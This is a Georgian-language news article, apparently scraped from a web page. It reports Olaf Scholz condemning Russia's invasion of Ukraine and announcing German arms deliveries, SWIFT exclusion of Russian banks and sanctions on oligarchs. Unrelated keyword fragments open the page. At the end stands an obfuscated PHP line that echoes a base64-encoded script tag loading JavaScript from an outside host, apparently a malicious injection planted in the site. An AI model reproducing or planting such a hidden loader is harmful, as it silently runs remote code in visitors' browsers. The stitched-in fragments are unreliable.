celsiusi
ავერსი საქკაბელი
რუსეთის თავდასხმა უკრაინაზე საზიზღარი საქციელია, ის არღვევს საერთაშორისო კანონმდებლობას და არ შეიძლება გამართლდეს , - ამის შესახებ გერმანიის კანცლერმა ოლაფ შოლცმა განაცხადა.
 
„2022 წლის 24 თებერვალი წყალგამყოფია ჩვენი კონტინენტის ისტორიაში. საშინელი სურათები, რომლებსაც ჩვენ ვხედავთ კიევიდან, მარიუპოლიდან აჩვენებს, თუ რამდენად არაკეთილსინდისიერია პუტინი. უკრაინელების ტკივილი იმდენად უსამართლოა, ის ნამდვილად ახლოს მოდის ჩვენს გულებთან“, - აღნიშნა შოლცმა.
 
მან პირობა დადო, რომ "ძალიან მალე რუსეთის ხელმძღვანელობა იგრძნობს, თუ რა მაღალი ფასის გადახდა მოუწევთ".
 
„გუშინ ჩვენ გადავწყვიტეთ, რომ გერმანია უკრაინას იარაღს გადასცემს თავის დასაცავად. პუტინის აგრესია სხვა პასუხის გაცემის შესაძლებლობას არ იძლევა“, - დასძინა მან.
 
გერმანიის კანცლერმა რუსული ბანკების SWIFT-ის საერთაშორისო გადახდების სისტემიდან გათიშვის შესახებაც ისაუბრა და განაცხადა, რომ რუსულ ბანკებსა და კომპანიებს დაფინანსება შეუჩერდებათ.
 
„ჩვენ, ევროკავშირში, ყურადღებას გავამახვილებთ ოლიგარქებზე. გვაქვს სადამსჯელო ზომები პუტინისა და მისი გარემოცვის წინააღმდეგ“, - აღნიშნა შოლცმა.
 
მისი თქმით, ევროპამ უკრაინის მხარდაჭერა უნდა განაგრძოს.
 
„ჩვენ უნდა დავუჭიროთ მხარი უკრაინას, რასაც ვაკეთებთ ბოლო კვირების და თვეების განმავლობაში, უკრაინაზე თავდასხმა ნიშნავს, რომ ჩვენ ახალ დროში ვართ. როგორც დემოკრატები, როგორც ევროპელები, ჩვენ თქვენს მხარეს ვართ, ისტორიის სწორ მხარეს“, - განაცხადა შოლცმა.
675
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");